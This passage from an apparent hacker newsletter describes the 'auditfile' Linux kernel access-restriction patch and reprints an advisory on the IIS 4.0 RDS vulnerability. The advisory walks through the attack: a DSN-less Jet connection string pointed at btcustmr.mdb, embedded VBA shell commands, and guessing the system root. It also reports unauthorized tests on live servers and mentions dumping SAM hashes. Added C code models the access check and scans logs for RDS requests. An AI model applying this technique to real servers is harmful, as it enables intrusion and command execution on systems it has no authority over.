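    unsigned n;

    printf("blob is %d bytes\n", len);
    for (n = 0; n < sizeof probes / sizeof probes[0]; n++)
        printf("%-16s mode %d: %s\n", probes[n].path, probes[n].fmode,
               auditfile_allowed(blob, len, probes[n].path, probes[n].fmode)
                   ? "allowed" : "denied");
    return 0;
}
```

      	The probes show two consequences of the prefix matching worth knowing
      	when writing a policy: "r/etc/*" permits /etc/passwd but not an open of
      	the directory /etc itself, while "b/tmp*" covers /tmp, everything below
      	it and also any sibling whose name starts with /tmp; likewise a rule
      	without a trailing * still matches every longer path beginning with it.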
      	
      
      ----------[ some options I use on my box
      in.telnetd.conf
      
      	b/dev*
      	r/etc/*
      	r/lib/*
      	r/usr/*
      	b/home/*
      	r/bin/*
      	b/tmp/*
      	b/var/*
      
      website.telnetd.conf
      
      	b/dev*
      	r/etc/*
      	r/lib/*
      	r/usr/sbin/website
      	r/home/website*
      	w/home/website/.bash_history
      	r/bin/*
      	b/var/*
      	r/sbin/su
      	r/usr/bin/dircolors
      	r/security*
      	r/usr/bin/vi
      	r/usr/bin/vim
      	r/usr/bin/talk
      	r/root/.bashrc
      	r/usr/local/bin/tty
      	r/usr/local/bin/who
      	r/usr/bin/write
      	r/usr/bin/mesg
      	r/usr/bin/grep
      	r/usr/bin/awk
      	r/usr/bin/sed
      	r/usr/bin/less
      	r/usr/lib*
      
      
      	(Yeah, these are the restrictions I use on the shell on our website)
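      An added user-space model of the check (example code written for this page, not part of the patch or its tarball): it parses config lines like the ones above into a mode and a pattern, applies the per-entry rule that an entry must cover every access the open requests, and uses an anchored glob so an entry such as r/sbin/su does not cover /sbin/sudo. The website_conf table is a constructed subset of the list above.

```c
#include <stdio.h>
#include <string.h>

/* Mode bits matching the codes the patch stores after each entry:
 * 1 allows read, 2 allows write, 3 allows both (config prefixes r, w, b). */
enum { AF_READ = 1, AF_WRITE = 2, AF_BOTH = 3 };

/* Constructed subset of website.telnetd.conf, as the program would read it. */
static const char *website_conf[] = {
    "b/dev*", "r/etc/*", "r/lib/*", "r/usr/sbin/website", "r/home/website*",
    "w/home/website/.bash_history", "r/bin/*", "b/var/*", "r/sbin/su",
    "r/usr/bin/vi", "r/usr/lib*",
};
#define WEBSITE_CONF_LEN (sizeof website_conf / sizeof website_conf[0])

/* Anchored glob match: '*' matches any run of characters, including none,
 * and the mask must account for the whole path, so "/sbin/su" does not
 * cover "/sbin/sudo" while "/etc/*" covers everything under /etc/. */
int af_match(const char *path, const char *mask)
{
    for (;; path++, mask++) {
        if (*mask == '\0')
            return *path == '\0';
        if (*mask == '*') {
            const char *rest = mask + 1;
            for (;; path++) {           /* try every split point */
                if (af_match(path, rest))
                    return 1;
                if (*path == '\0')
                    return 0;
            }
        }
        if (*path != *mask)
            return 0;
    }
}

/* Split one config line ("r/etc/*") into its mode and pattern.
 * Returns 0 for a line that is not of that form. */
int af_parse_line(const char *line, int *mode, const char **pattern)
{
    switch (line[0]) {
    case 'r': *mode = AF_READ;  break;
    case 'w': *mode = AF_WRITE; break;
    case 'b': *mode = AF_BOTH;  break;
    default:  return 0;
    }
    if (line[1] != '/')
        return 0;
    *pattern = line + 1;
    return 1;
}

/* The patch's rule: an open is allowed only if some entry matches the
 * path and its mode covers every requested access (read, write or both);
 * with no such entry the open fails with EACCES. */
int af_allowed(const char *const *conf, size_t n, const char *path,
               int want_read, int want_write)
{
    int need = (want_read ? AF_READ : 0) | (want_write ? AF_WRITE : 0);
    size_t i;
    for (i = 0; i < n; i++) {
        int mode;
        const char *pat;
        if (!af_parse_line(conf[i], &mode, &pat))
            continue;               /* malformed lines grant nothing */
        if ((mode & need) == need && af_match(path, pat))
            return 1;
    }
    return 0;
}

int main(void)
{
    static const struct { const char *path; int r, w; } probes[] = {
        { "/etc/passwd", 1, 0 }, { "/etc/passwd", 0, 1 },
        { "/home/website/.bash_history", 0, 1 },
        { "/home/website/.bash_history", 1, 1 },
        { "/sbin/sudo", 1, 0 }, { "/dev/null", 1, 1 }, { "/tmp/x", 1, 0 },
    };
    size_t i;
    for (i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-30s r=%d w=%d -> %s\n", probes[i].path, probes[i].r,
               probes[i].w,
               af_allowed(website_conf, WEBSITE_CONF_LEN, probes[i].path,
                          probes[i].r, probes[i].w) ? "allowed" : "EACCES");
    return 0;
}
```

      Note that a read+write open of .bash_history is refused even though one entry grants read and another grants write: a single entry has to cover the whole request.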
      	
      
      -------------------------------------------------------------------------------
      Download my Auditfile tarball for examples of how to use this; the shell on our 
      website is secured with auditfile.
      
      
      
      
      Some Extra Security In The Linux Kernel - Auditfile
              a paper by Frank van Vliet alias {}
                    karin@root66.nl.eu.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~	    
      RooT66                      http://root66.nl.eu.org
      ShellOracle          http://www.shelloracle.cjb.net
      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
      
      @HWA     
      
158.0 Lets hack an NT box...how they are being defaced & how to secure
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Info submitted by: anon_defacer & compiled/assembled by Ed.
      
      Intro:
      ~~~~~~
      
      This isn't exactly bleeding edge information, I know, BUT nonetheless sites
      are still currently being actively defaced en-masse using these techniques
      (known simply as 'the RDS hack' around the net) so I thought it prudent to
      print the info and current available attack/patch options that are in use
      or should be employed on your NT server. - Ed
      
      Source: http://www.wiretrip.net/rfp/p/doc.asp?id=1&iface=2
      
      rainforest puppy's advisory and code
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.wiretrip.net/rfp/p/doc.asp?id=5&iface=2
      
      


     #### ALERT! #### RDS/IIS 4.0 Vulnerability and exploit #### ALERT! ####

                     By rain forest puppy / ADM / Wiretrip


             "it...is direct, immediate, and almost 100% guaranteed
              to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE
              IS RIDICULOUS!"
                                             -Russ Cooper, NTBugtraq


             "This exploit also does *not* require the presence of
              any sample web applications or example code...the 
              issue affects at least 50% of the IIS servers I have
              seen"
                                             -Greg Gonzalez, NTBugtraq


             "Groovy, baby."
                                             -Austin Powers, Spy who Shagged Me


     - - - Table of Contents:

     1. Names, PRs and the Media: State of Security Advisories
     2. RDS Vulnerability Background
     3. *MY* Guess at Greg's RDS Vulnerability
     4. Bonus Aspects of My Version of the Exploit
     5. Command Line Options
     6. Random Q & A
     7. Signoff
     8. The code!!!!

     - 1 - Names, PRs and the Media: State of Security Advisories

     When I was at DefCon, I had an interview with a reporter who was doing
     a story on 'hacker handles'. Of course, with a handle like Rain Forest
     Puppy, I was a sure-win. After a 20 minute chat, the last question he
     asked me was "What is your real name?" Of course, my response was "does
     that matter?" Well, to him it did. It seems like it matters to all the
     big, formal media types and vendors. A perfect example of this would be
     the whole RDS saga. Greg Gonzalez's original post gave me credit, since
     he used some of what I talked about in my ODBC advisory posted to Bugtraq
     earlier (thanks, Greg!). Russ Cooper did a recap, but failed to mention
     me. Microsoft's advisory acknowledged Russ and Greg as well, sans me.

     Now, I'm not an egomaniac that needs to see my name splashed over
     everything. For that matter, those of you who know me personally know how
     laid back I am concerning most issues. The point I'm trying to make is
     whether or not a name is 'unsuitable' for mention in something as flashy
     as a Russ or MS post (although side note, I must admit, Wired and ZDNet
     have lightened up to this fact, especially lately with all the Dildog and
     Orifice talk going on). If I remember correctly, David Litchfield got
     some mentions for various vulnerability findings he had. But everyone
     referenced him as David Litchfield, not 'Mnemonix', which is his hacker
     handle (BTW, greetings to Mnemonix. Thanks for serving as an example. :)
     Even lately, for those of you Bugtraq fans out there (hey, how the hell
     are you reading this, anyway!?!?!), you'll have noticed gone are the
     loveable bytes of 'Aleph1' in place of Elias Levy. Now, in Aleph1's
     defense, I can see justification of the shift. But the general fact that
     there is a need/trend for a shift is concerning me.

     The only taboo I can think of for the 'evil' of a hacker handle is the
     issue of the obvious: anonymity. Apparently I must be running around
     doing 'very bad things' (funny movie, BTW), and so I need to hide who I
     really am, right? 

     Uh, no. (For lack of a snappy comeback)

     I don't want to make this diatribe overly long, since I know you're
     only here for the exploits anyway :) But seriously, why use a handle?
     Well, there is a sense of tradition, for one. I shall not explain,
     because I think it's apparent. The other is a sense of community. If
     you're going to engage in a security discussion, why not do it with other
     security professionals. And where can you just so happen to find a large
     gaggle of people who know about security? Your local IRC server, sitting
     in #hackphreak (watch out, JP logs), #hackteach, etc. These people have
     nicknames themselves. So get yourself a nick and join in the
     conversation!

     But really, I use an alias. Does that make me evil? If I told you
     my real name, would that shift your perspective of me into the light of
     good? We'll get back to this, I want to transgress to another issue.

     I use a handle. My only collateral at this point is my name, and my
     name alone. If I find a big hole, post a research paper, etc, it adds
     nothing but perhaps an "atta'boy" to the accomplishments of my nickname.
     I've talked to people in real life and held discussions about that 'Rain
     Forest Puppy' guy, they not knowing I was Rain Forest Puppy. The
     accomplishments belong to that name, and that name alone...unless I start
     equating that name with other things. So, let's pretend I did. Let's say
     I tossed my real name out there, and got that associated with my handle.
     Now people in real life will equate the findings of Rain Forest Puppy to
     me. I can add in my company name. Now my company can ride the 'success'
     (if you will) of my findings as well, just because they're associated with
     my name. (Come on, you know these situations exist. Transmeta is cool
     just because the name 'Linus' is involved.) If I equate all kinds of
     aspects together, I can then distribute the attention (a.k.a. advertising)
     to them all as well. Think about it....if I found the next remote root
     compromise in, say, sshd, I could slap not only my handle and name but
     also my company name (Amazonian Trees, Inc) all over it! Wow, would that
     not be great marketing for Amazonian Trees, Inc, especially if ATI's
     primary service was security related!

     But hey, it's America. We live to make money, so it seems. So why not
     do this? Right? Well, 'tis also the trend.

     Look at all the press releases on security issues. The most recent one
     was by Greg Gonzalez himself, for his company Information Technologies
     Enterprises, Inc. The press release is at

             http://www.infotechent.net/itenews.htm

     Now, what I find interesting is that Greg has made a post to NTBugtraq
     about the RDS vulnerability, yet will not release details of the
     vulnerability until next week. Hmmm. Ok, so he can't release details,
     but he can release press releases about it. Your point was made with the
     post to NTBugtraq...the point of the press release is to ride the fame to
     gain corporate exposure (which I'm equating as an excessive, corporate,
     political machine type move which isn't all that wonderful). Not to pick
     on Greg, because it's the trend. Look at WebTrends. They issued a press
     release on 'their finding of security vulnerabilities in IIS sample
     scripts' (never mind the fact that I had talked about such in a previous
     Phrack article last December). The press release is at

             http://www.webtrends.com/news/releases/release.asp?id=81

     Wow, a vendor of a security scanner using the finding of vulnerabilities
     as free marketing for their products. Well, do it where you can, right?

     I will move off this subject, because L0pht has a nice long
     composition on the matter in the Soapbox on their website, at

             http://www.l0pht.com/~oblivion/soapbox/index.html

     One interesting statement L0pht makes, going back to Greg Gonzalez and
     Russ Cooper keeping the details of the RDS vulnerability to themselves for
     a week:

             "Now we have software vendors keeping things secret. At 
              least secret for a substantial period of time. Is this 
              the way we want the industry to behave?"

     Wow, right on, brothers Mudge, Dildog, Weld Pond et al. Greetings, BTW.

     ---- Credits and Thank Yous ----------------------------------------------

     I'd like to take this brief moment to say thank you to L0pht (www.l0pht.com)
     for helping me test my perl script and taking time to review my advisory. 
     I'd also like to thank Vacuum of www.technotronic.com and Mike Dinowitz 
     of www.houseoffusion.com for their input and testing as well.

     --------------------------------------------------------------------------

     So back to the 'only a handle' thing. You have to understand that I 
     have a different perspective on it all. I publish everything under an 
     anonymous handle. What do I gain from this? Nothing personally. Nadda. 
     Zip. The handle itself may gain some fame, but not me personally. I do 
     not profit from this one way or another. What I do I do because I want 
     to, on my free time--and do it in a manner that is not greedy in any aspect.
     I don't seek to gain, and in the current setup, I really can't gain a
     whole hell of a lot. But I'm the bad guy, I forgot. It's much more
     normal to leverage a security vulnerability as a marketing tool than it is
     to just 'give' time and research away. Wow, I need to get with the Y2K I
     guess.

     Fine then. (Last tangent, then we'll get to the RDS issue, I promise :)
     So, going back to you seeing me in the light of good.... Could you better
     relate if you had a 'normal' name? Are you embarrassed to say/use 'Rain
     Forest Puppy' in conversation/publication? (Well, I mean this generically
     for all hacker handles, but I'm specifically talking about mine here)
     Would I be seen as more a security resource/less of a evil hacker if you
     had a name to associate with my handle? Well, I guess I should make that
     step. From now on, you can associate Mr. Russell F. Prigogine with the
     nick Rain Forest Puppy (Hmmm...no, the initials are not mere
     coincidence...clever, eh?). But since the big 'Russ' on campus is Russ
     Cooper, NTBugtraq moderator extraordinaire (who believes sample apps are
     not a security concern worth talking about. Real slick, Russ), I would
     prefer to have Mr. R.F. Prigogine (Mr. optional) used, if you can't--or
     don't want to--use the nick Rain Forest Puppy.

     So there. (As some would say) I sold out (oh, the horror of it). JP,
     add that to your profile database. While I gather the broken pieces of my
     dignity we'll move along to what you really want...

     - 2 - RDS Vulnerability Background

     Last Friday Greg Gonzalez (re)posted his findings of vulnerabilities
     in regards to the RDS problems originally detailed in MS98-004, which came
     out around July 16, '98. He took that issue (which is basically the
     simple fact that 'Remote Data Service' components allow *remote* access to
     your *data*....who would have thought?) and combined it with the Jet
     pipe/VBA delimiter 'feature' I discussed in my recent advisory. The
     result?

             1. You can make remote queries via RDS
             2. You can embed NT command line commands in queries

     Well, that's a pretty good combo. (side note, not to brag or anything, but
     I mention the fact that RDS can be used to do that in my ODBC advisory,
     under the title 'Msadc'). But, Greg threw in a twist which supposedly
     is the kicker:

             3. You don't need user IDs (and therefore no password required),
              does *not* require the presence of any sample Web applications 
              or example code, or even an active database

     I suppose that's a pretty big kick. Wow, no UIDs/passwords, NO SAMPLE
     SCRIPTS! Well, I guess that means Russ Cooper will let the post through
     then... (if you don't get it, go back and re-read section one).

     So Greg can do all that. And, to reiterate how dangerous this problem
     really is...


     "it...is direct, immediate, and almost 100% guaranteed
     to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE
     IS RIDICULOUS!"
     -Russ Cooper, NTBugtraq


     "This exploit also does *not* require the presence of
     any sample web applications or example code...the
     issue affects at least 50% of the IIS servers I have
     seen"
     -Greg Gonzalez, NTBugtraq



     *** MEDIA FOLKS ***        As it seems it's fun to attach dollar loss amounts
                             to advisories, I will say the potential amount of
                             damage, due to the fact that at least 50% of all
                             IIS servers Greg has seen (hopefully he's seen a 
                             lot) are vulnerable, using my sophisticated
                             reliable statistical computation method that is 
                             authoritative, I'd place damage loss somewhere in
                             the 'close to Bill Gates salary(tm)' range.



     Now, the sad part. As I mentioned before, both Greg and Russ (from this
     point on, all instances of 'Russ' refer to Russ Cooper, and not the name
     R. F. Prigogine) both know the details of this vulnerability. And yet
     they are keeping them amongst themselves until next week. Does this even
     disturb anyone? Greg says at least 50% of the IIS servers are
     vulnerable...

     DO WE WANT RUSS COOPER WITH THE KEYS TO 50% OF IIS SERVER ON THE INTERNET?

     Ok, I have a scenario that's the same in principle, but will disturb
     people even more: 

     ---- Begin same scenario ------------------------------------------------

     Rain Forest Puppy (or R. F. Prigogine, if it makes you feel better/is more
     visually pleasing) has found a hole in the latest build of Apache web
     server. There's a hole. I will announce there's a hole. I'll write up a
     few PRs as well. But I will not tell you the exact nature of it. Don't
     worry, Apache group will code a fix, and you'll be all set in a jiffy. In
     the meantime, I'm not going to release the details of the exploit of the
     hole. Instead I'm going to just keep it to myself....and my good buddies 
     Vacuum, Antilove, Stranger, and the rest of the Wiretrip and ADM crews.

     -------------------------------------------------------------------------

     Hmmm....I bet *that* disturbed you. How about a better translation:

     ---- Begin translated same scenario -------------------------------------

     I, RFP, have found a hole in Apache that I will not tell you about until
     later, but in the meantime, me and my hacker buddies will know about it!
     Nnnnnnaaaaaaayyyyyyaaaaahhhhhh! So sit back and feel helpless.

     -------------------------------------------------------------------------

     What's the difference? Only the integrity of the people involved. Again,
     a name thing perhaps. Russ Cooper, Greg Gonzalez, they're Ok. Rain
     Forest Puppy, Antilove, nope, that's scary. You don't even know if Greg
     Gonzalez isn't really a hacker that goes by 'Digital Killer'. I push for
     the point that no matter who it is in any case, it's wrong.

     Elias Levy would have told everyone the bug. :)

     NTBugtraq = moderated disclosure. Hmmm. I still like Russ's "Would
     you pay?" Administrivia from Feb 99, in which he says:

             "Someone else makes the Security Portal and you get what they
              think you need"

     As opposed to getting what Russ thinks we need instead? It all depends on
     whether or not the other guy denies posts about sample scripts....(if you
     *still* don't get it, re-read section one AGAIN).

     Ok, ok, so that RDS background turned more into a political thing.
     Well, that's because it is. At this point, Russ and Greg have the
     keys to IIS servers. I don't know about you, but I'm not liking it. So
     I'm getting off my ass and doing something. Besides the fact that this is
     all published stuff at this point.

     Also, I may be considered 'irresponsible' for posting the exploit.
     Now, I would say *maybe* it would be debatable if I had posted *only* the
     exploit. But I have posted not only a very long diatribe, but also my
     guess of the vulnerability, which includes examples of analysis and
     theory. My hopes are to educate people on what the problem is, and how I
     went about finding it so that they can perhaps learn how to do it
     themselves. Education. It's the key, and that's what I'm trying to do.
     No, no vendor education...ADMIN education. USER education. I know I will
     probably be futile as a whole in the end, but maybe a few people will
     learn something, and that's all that matters to me.

     - 3 - *MY* Guess at Greg's RDS Vulnerability

     (I say 'guess' because I may not be right. But in any event, I
     wouldn't be writing all this unless I found something moderately
     interesting ;)

     Ok, so Greg's RDS vulnerability has three main aspects:

             1. You only need RDSServer.DataFactory component
             2. It uses Jet queries with my embedded VBA via pipes trick
             3. You don't need userIDs (and therefore no password required),
              does *not* require the presence of any sample Web applications 
              or example code, or even an active database

     Now, for those of you who don't know, RDS is basically a way to do
     remote data queries to a server. This is done over the web. Basically
     your client app communicates via HTTP to the /msadc/msadcs.dll on your
     server. The msadcs.dll exposes the RDSServer.DataFactory object, or better
     known as the AdvancedDataFactory.

     Now AdvancedDataFactory only has four methods, so we're kind of limited
     on what we can do. We can CreateRecordSet, Query, SubmitChanges, and
     ConvertToString. Query and SubmitChanges require a valid database to work
     upon. The other two are just data mangling functions. So there you have
     it, that's what we have to work with.

     I played with CreateRecordSet and ConvertToString. This actually
     relays data from the client, to the server, and back. My hopes were that
     somewhere in there I could slip one of my pipe-VBA-shells in there and do
     fun stuff. But nope, all they did was regurgitate the data in a different
     flavor. Oh well.

     SubmitChanges just basically does an elaborate UPDATE/INSERT, where it
     just syncs the server's database with the client's recordset. So that
     leaves Query.

     Well Query lets us run queries against an (existing) database. And we
     know we can embed our pipe-VBA-shells in queries, so Query looks good.
     But this is nothing spectacular. And there is one catch: the need for an
     existing database. We need to pass a DSN to the ActiveDataFactory to
     actually run the query on. The problem with the DSN is that:

             1. DSNs can require UIDs and passwords
             2. There's no way to get a list of available DSNs
                     (** through RDSServer.DataFactory functions, that
                             I'm aware of **)
             3. I'd say a DSN constitutes an 'active' database

     So DSNs blow away point 3 of our known things about Greg's RDS
     vulnerability. What if we can get around using DSNs?

     Well, we can. See, you can go the easy route by specifying "DSN=rfp",
     and then the server keeps all the internal information about that DSN,
     including driver, actual database file location (if it's a file-based
     driver), UID, password, connection parameters, etc. Well, what's fun is
     that we can directly give all that stuff in the query setup instead of a
     DSN. Let's say we setup a DSN named 'rfp' (for Rain Forest Puppy or R. F.
     Prigogine). We will use these parameters:

             DSN name 'rfp'
             Microsoft Access (Jet) driver
             c:\rfp.mdb for our database
             UID will be 'rfp'
             password will be 'prigogine'

     So by invoking "DSN=rfp", the server knows to use the Access driver on the
     c:\rfp.mdb file. DSNs are a nice tight way to precompose all that
     information. Or we can do it on the fly. Rather than issuing a "DSN=rfp"
     connect string, I can use instead:

             "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\rfp.mdb;"

     This will still invoke the Access (Jet) driver, and tell it to directly
     use c:\rfp.mdb. No UID. No password. Not even worrying about if/what
     DSNs exist. In the words of Cartman, "Sweet".

     That whacks out part of known point #3 (no UID or password). We're
     going to use the RDSServer.DataFactory control (known point #1), and we're
     going to use the Access driver, with fun pipe-VBA-shell features (known
     point #2). We're not using any other web sample scripts, so that cuts out
     another portion of known point #3. Oh, we're so close...can you taste it?
     (and what does it taste like? chicken?)

     There's still one minor detail. Notice we have to specify the 'dbq='
     parameter in the connection setup. And this needs to be a valid file. If
     it's not, the SQL engine on the server side will fail and return errors
     before it even gets around to looking at our queries. But damn, we need
     an .mdb file to connect to. Well, if you look in the Access ODBC
     reference on Microsoft's website (which sucks, half the links were broken at
     various moments through the night while sifting through it...go MS. I
     don't blame you though--you probably engineered your site/servers with
     Microsoft products, and that explains it right there) you will see that
     you can pass a CREATE_DB parameter to the Access driver. This will cause
     the driver to construct a valid (empty) .mdb file. Woohoo! (not to 
     be confused with w00w00; the former is an expression of joy, the latter is
     a cool group of guys that I had the fortune of hanging out with at DefCon)
     So in our connection setup we pass a "CREATE_DB=c:\rfp.mdb" attribute with
     everything else and lo and behold, it...... <to be continued...>
      
      ----- Some words about my sponsors ---------------------------------------
      
      -- www.technotronic.com                Technotronic! Great place!
      
      Run by fellow Wiretrip'er Vacuum, who is also a co-founder of Rhino9
      (before Rhino9 'disbanded'; Neon, Horizon, Xaph: come back to the US!),
      boasting a slick HTML design recently redone by yours truly (Rain Forest
      Puppy/R. F. Prigogine), it's definitely a good site for the latest
      security information--especially while PacketStorm is struggling to get
      back on its feet (thanks, JP. Now die. What, you're suing me now?!?)
      
      While you're there, be sure to check out:
      
      * Winfingerprint! -- coded by Vacuum, this tool lets you remotely query a
      windows box and see if it's a PDC, BDC, Member
      server, SQL server, etc. Also look for the Unix
      port of it by me sometime soon (after I finish
      all this RDS stuff)
      * Horizon's Page! -- that's right. Elite HTML coded by Humble himself.
      Problem was he didn't know where to put the shell
      code...<a href>? J/K :) The URL is /horizon/
      * Newest R9 Tools! -- coming soon. Before 3/4ths of Rhino9 moved to
      Germany, there was one last code fest, and some
      fun binaries came out of it. Look for them soon!
      Technotronic also has the R9 mirror at
      rhino9.technotronic.com
      
      
      
      -- www.l0pht.com                L - zero - p - h - t
      
      Everybody knows L0pht (even senators!) A very active 'independent
      security (watchdog) group' who include Dr. Mudge & Dildog (BO2K creator).
      
      While you're there, be sure to check out:
      
      * L0phtcrack! -- one of the best NT password crackers out there! This
      will prove highly useful if you use this exploit
      to dump the SAM and grab the backup (not that
      I encourage hacking...I've done this many times
      in LEGIT contracted audits). It's a personal
      tool I've standardized on.
      * Advisories! -- L0pht releases a very nice variety of advisories, from
      Windows DLL problems and Cold Fusion script
      problems to Unix race conditions and symlink
      vulnerabilities.
      * NFR Modules! -- they've teamed up with NFR to be the supplier of many
      interesting N-code/NFR modules. They have a nice
      selection for your popular network attacks.
      
      ** plus I must note that the Palm Pilot stuff, Soapbox, and BBS are pretty
      awesome as well!
      
      
      -- www.houseoffusion.com A great independent Cold Fusion site!
      
      The site of a great friend of mine, Mike Dinowitz, who is my 'go to' man
      for all things Cold Fusion and has helped me out immensely with various
      Cold Fusion language issues (read: helped me work through some of the
      various Cold Fusion exploits that have surfaced). He does offer training
      for Cold Fusion...see 'Training Info' under '<Community>'. He co-authored
      "Advanced Cold Fusion 4.0 Application Development" and "Cold Fusion Web
      Application Construction Kit" vols 2 and 3, and was the founding member of
      Team Allaire. Plus, he's an all-around good guy(tm). Also an editor of CF
      Advisor, at www.cfadvisor.com.
      
      While you're there, be sure to check out:
      
      * MunchkinLAN! -- a CF based web scanner, which is actually very minimal
      code and runs out of an Access db.
      * Mike's Mods! -- many modifications to the Cold Fusion Forums scripts,
      which include speed/operation improvements.
      * CF-Talk! -- Mike is the moderator/owner of the CF-Talk list, which is
                                   a high traffic list discussing Cold Fusion related
                                   development issues, security, etc.


     -- Thanks again to all of the above!

     -------------------------------------------------------------------------

     <continued from above> ...didn't work. Damn. The problem was that it
     was passing the CREATE_DB parameter during the SQLDriverConnect() phase,
     and that just isn't going to cut it. We need to issue a
     SQLConfigDataSource() call (I think that was it...my mind is a mush of
     ODBC/SQL/RDS/ADO/OLEDB/FMP API right now) to get CREATE_DB to do its
     thing, and RDSServer.DataFactory.Query just wasn't going to give us love.
     So, after struggling with other nuances and ideas, I concluded that I
     couldn't make a DSN, or a .mdb from scratch using Access SQL via
     RDSServer.DataFactory without connecting to a database/.mdb beforehand.

     (**NOTE: if you know how this can be done, EMAIL ME! I WILL TRADE YOU
             0DAY! :) rfp@wiretrip.net )

     Well damn, so we need a database to make this work. Any 'ol database
     will do (hell, even the WINS or DHCP .mdb should work >:). But
     unfortunately, none come by default on a standard NT install. Bummer.
     But wait....all is not lost....

     It seems when you do a 'typical' or better install with Option Pack 4,
     a particular .mdb is installed...namely the btcustmr.mdb which is
     installed to %systemroot%\help\iis\htm\tutorial\. Microsoft saves the
     day! They're just so damn efficient at helping us hack their own
     product...

     To get IIS 4.0 you practically need to install Option Pack 4, which
     will also then install MDAC 1.5--this is good. Let's just hope they
     didn't pick the 'minimal' install... The last catch is that we need to
     figure out what %systemroot% is. On the majority of the systems it will
     probably be c:\winnt, d:\winnt, e:\winnt, or f:\winnt (don't laugh, mine
     is f:). I guess some wacko might do \win, \windows, \nt, and if you
     upgrade it may be \winnt351 or \winnt35. Well, we can do a little 'brute
     force' on all those combinations until one works. Oh, and no, you can't
     do "dbq=%systemroot%\help\iis\htm\tutorial\btcustmr.mdb"...the SQL driver
     pukes.

     So that's my guess! Mr. Gonzalez is using a connection string similar to

             "driver={Microsoft Access Driver (*.mdb)};
                     dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;"

     with a query that contains one of the pipe-VBA-shell commands. Now, I
     think this technically meets all the known points of the exploit--the only
     fuzzy one is where Greg mentions "no need of an *active* database". Now,
     I may be reading into it, but btcustmr.mdb is hardly active. It's a
     totally unused .mdb sitting in a directory most people probably didn't
     know existed.
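     An added defensive example, written for this page and not part of rfp's advisory or his script: a scanner over constructed IIS log lines that flags requests to the /msadc/msadcs.dll endpoint named above, case-insensitively since IIS resolves paths that way, and tallies them per client address so a burst from one source stands out. The log field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is an assumption about how W3C extended logging was configured on the server.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* The RDS endpoint the advisory names. IIS resolves paths case-insensitively,
 * so the match below must ignore case as well. */
#define RDS_ENDPOINT "/msadc/msadcs.dll"
#define MAX_IPS 64

/* Constructed IIS log lines (made up for this example, not real traffic).
 * Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status */
static const char *sample_log[] = {
    "1999-07-25 03:12:01 192.0.2.10 GET /default.htm - 200",
    "1999-07-25 03:12:09 192.0.2.77 POST /msadc/msadcs.dll - 200",
    "1999-07-25 03:12:10 192.0.2.77 POST /MSADC/MSADCS.DLL - 200",
    "1999-07-25 03:13:40 192.0.2.10 GET /images/logo.gif - 304",
    "1999-07-25 03:14:02 192.0.2.77 POST /msadc/msadcs.dll - 500",
    "1999-07-25 03:15:17 192.0.2.31 GET /msadc/readme.txt - 404",
};
#define SAMPLE_LOG_LEN (sizeof sample_log / sizeof sample_log[0])

/* Case-insensitive substring search (strcasestr is not ISO C). */
static const char *ci_strstr(const char *hay, const char *needle)
{
    size_t n = strlen(needle);
    for (; *hay != '\0'; hay++) {
        size_t k = 0;
        while (k < n && hay[k] != '\0' &&
               tolower((unsigned char)hay[k]) == tolower((unsigned char)needle[k]))
            k++;
        if (k == n)
            return hay;
    }
    return NULL;
}

/* Extract client address and URI stem from one line; 0 if it does not parse. */
static int parse_request(const char *line, char ip[64], char stem[512])
{
    return sscanf(line, "%*s %*s %63s %*s %511s", ip, stem) == 2;
}

/* 1 if the request's URI stem hits the RDS endpoint in any letter case. */
int is_rds_request(const char *line)
{
    char ip[64], stem[512];
    return parse_request(line, ip, stem) && ci_strstr(stem, RDS_ENDPOINT) != NULL;
}

/* Count RDS requests across a log and report the client address that sent
 * the most of them ("" if none). Returns the total number of hits. */
int count_rds_requests(const char *const *lines, size_t n,
                       char *top_ip, size_t top_len)
{
    char ips[MAX_IPS][64];
    int hits[MAX_IPS], nips = 0, total = 0, best = -1;
    size_t i;
    for (i = 0; i < n; i++) {
        char ip[64], stem[512];
        int k;
        if (!parse_request(lines[i], ip, stem) || ci_strstr(stem, RDS_ENDPOINT) == NULL)
            continue;
        total++;
        for (k = 0; k < nips && strcmp(ips[k], ip) != 0; k++)
            ;
        if (k == nips) {
            if (nips == MAX_IPS)
                continue;               /* table full: counted, not attributed */
            snprintf(ips[nips], sizeof ips[nips], "%s", ip);
            hits[nips++] = 0;
        }
        hits[k]++;
        if (best < 0 || hits[k] > hits[best])
            best = k;
    }
    if (top_ip != NULL && top_len > 0)
        snprintf(top_ip, top_len, "%s", best >= 0 ? ips[best] : "");
    return total;
}

/* Wrappers over the constructed sample so the results can be checked by name. */
int rds_hits_in_sample(void)
{
    return count_rds_requests(sample_log, SAMPLE_LOG_LEN, NULL, 0);
}

const char *rds_top_client_in_sample(void)
{
    static char top[64];
    count_rds_requests(sample_log, SAMPLE_LOG_LEN, top, sizeof top);
    return top;
}

int main(void)
{
    size_t i;
    for (i = 0; i < SAMPLE_LOG_LEN; i++)
        if (is_rds_request(sample_log[i]))
            printf("RDS request: %s\n", sample_log[i]);
    printf("%d hits on %s, most from %s\n", rds_hits_in_sample(),
           RDS_ENDPOINT, rds_top_client_in_sample());
    return 0;
}
```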

     Just to double check, I did a quick little test...and six of the ten
     servers I picked off the Internet were susceptible to this method. That'd
     That's a tad better than Greg's 50%, but I had a small population sample, so I'll
     give him the benefit of the doubt.

     Now, I obviously could be wrong. Maybe Greg found a way to create the
     .mdb, or some other way where he doesn't need to rely on the existence of
     btcustmr.mdb. I'm not claiming to be a SQL/database wiz--actually, I hate
     database applications. Period. They're gross. But I put up with it for
     the better good of the Internet. :) But yes, I could be wrong, and I'm
     willing to admit it.

     Let me also mention the contenders. They were contenders, but
     definitely did not make the final round because as much as they 'looked' and
     'smelled' exploitable, I couldn't get them to crack:

     1. Data Shape Provider. This already has hooks into the VBA
